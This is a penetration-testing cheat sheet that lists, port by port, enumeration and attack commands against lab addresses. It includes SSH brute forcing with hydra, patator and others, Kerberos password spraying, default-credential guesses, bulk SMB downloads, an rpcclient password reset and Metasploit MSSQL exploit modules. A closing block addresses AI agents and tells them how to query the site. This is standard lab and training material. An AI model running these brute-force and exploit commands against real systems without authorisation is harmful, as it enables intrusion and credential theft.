# 02 Port Enumeration ## Port 21 - FTP ``` nmap --script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 10.11.1.5 ``` ## Port 22 - SSH try to login with default/simple account : admin:admin, root:root, user:password Brute Force ``` BruteForce: patator ssh_login host=10.11.1.5 port=22 user=root 0=/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt password=FILE0 -x ignore:mesg='Authentication failed.' hydra -l user -P /usr/share/wordlists/password/rockyou.txt -e s ssh://10.11.1.5 medusa -h 10.11.1.5 -u user -P /usr/share/wordlists/password/rockyou.txt -e s -M ssh ncrack --user user -P /usr/share/wordlists/password/rockyou.txt ssh://10.11.1.5 ``` ## Port 25 - SMTP ``` nc -nvv 10.11.1.5 25 HELO foo telnet 10.11.1.5 25 VRFY root ``` > > > ``` > nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.11.1.5 > smtp-user-enum -M VRFY -U /root/sectools/SecLists/Usernames/Names/names.txt -t 10.11.1.5 > ``` ## Port 53 - DNS ``` dnsrecon -d 10.10.10.192 ``` ## Port 88 - Kerberos ``` nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN.LOCAL'" 10.11.1.5 ``` {% embed url="" %} ``` python kerbrute.py -dc-ip 10.11.1.5 -users /root/document/ctf/htb/kb_users.txt -passwords /root/pass_common_plus.txt -threads 20 -domain DOMAIN -outputfile kb_extracted_passwords.txt ``` ## Port 110 - Pop3 ``` telnet 10.11.1.5 USER fkclai@10.11.1.5 PASS abcd1234 or: USER fkclai PASS abcd1234 # List all emails list ``` ## Port 111 - Rpcbind ``` rpcinfo -p 10.11.1.5 rpcclient -U "" 10.11.1.5 #rpcclient $>srvinfo #rpcclient $>enumdomusers #rpcclient $>querydominfo #rpcclient $>getdompwinfo //password policy #rpcclient $>netshareenum #rpcclient $>enumprivs #rpcclient $>setuserinfo2 23 abcd@1234 ``` ## Port 135 - MSRPC ``` nmap 10.11.1.5 --script=msrpc-enum rpcdump.py 10.10.10.192 -p 135 >> /tmp/rpc.txt ``` ## Port 139/445 - SMB ``` #Eumernation smbmap -H 10.11.1.8 smbmap -u "guest" -p "" -H 10.11.1.31 nmap --script smb-enum-shares -p 139,445 enum4linux nest.htb smbclient -L nest.htb smbclient -U "r.thompson" -L \\\\10.10.10.182 smbclient -L //10.10.10.192 -N # Check vulns nmap --script smb-vuln* -p139,445 -T4 -Pn 10.11.1.8 nmap --script smb-enum-*,smb-vuln-*,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-protocols -p 139,445 10.11.1.8 nmap --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse -p 139,445 10.11.1.8 nmap --script vuln -p 135,139,445 10.10.10.40 ``` ``` smbmap -u TempUser -p welcome2019 -H nest.htb -R smbclient \\\\nest.htb\\Data -U TempUser smbclient //10.10.10.192/forensic -U audit2020 --socket-options='TCP_NODELAY IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=131072 SO_SNDBUF=131072' -t 40000 mask "" recurse ON prompt OFF mget * ``` ## Port 389,636 LDAP ``` ldapsearch -h 10.11.1.8 -p 389 -x -b "dc=fkclai,dc=com" ldapsearch -x -h 10.11.1.8 -D 'DOMAIN\fkclai' -w 'hash-password' ldapdomaindump 10.11.1.8 -u 'DOMAIN\fkclai' -p 'hash-password' windapsearch.py -d abcde.local --dc-ip 10.10.10.175 -U https://github.com/ropnop/windapsearch ``` ## Port 1433 MSSQL ``` nmap -p 1433 -sU --script=ms-sql-info.nse 10.11.1.8 #MSF payload use auxiliary/scanner/mssql/mssql_ping use auxiliary/scanner/mssql/mssql_login use exploit/windows/mssql/mssql_payload ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://calvin-lai.gitbook.io/calvin-lai-security/tools/02-eumernation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.